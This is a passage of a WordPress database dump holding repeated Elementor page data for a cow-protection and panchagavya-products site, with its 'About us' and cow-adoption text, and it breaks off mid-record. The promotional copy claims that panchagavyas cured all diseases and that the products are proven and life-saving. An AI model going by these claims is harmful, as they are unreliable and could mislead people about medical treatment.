ext\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11230,1871,'_elementor_page_assets','a:0:{}'),(11232,1872,'_elementor_edit_mode','builder'),(11233,1872,'_elementor_template_type','wp-page'),(11234,1872,'_elementor_version','3.7.8'),(11235,1872,'_wp_page_template','elementor_canvas'),(11236,1872,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11237,1872,'_elementor_page_assets','a:0:{}'),(11239,1873,'_elementor_edit_mode','builder'),(11240,1873,'_elementor_template_type','wp-page'),(11241,1873,'_elementor_version','3.7.8'),(11242,1873,'_wp_page_template','elementor_canvas'),(11243,1873,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11244,1873,'_elementor_page_assets','a:0:{}'),(11246,1874,'_elementor_edit_mode','builder'),(11247,1874,'_elementor_template_type','wp-page'),(11248,1874,'_elementor_version','3.7.8'),(11249,1874,'_wp_page_template','elementor_canvas'),(11250,1874,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 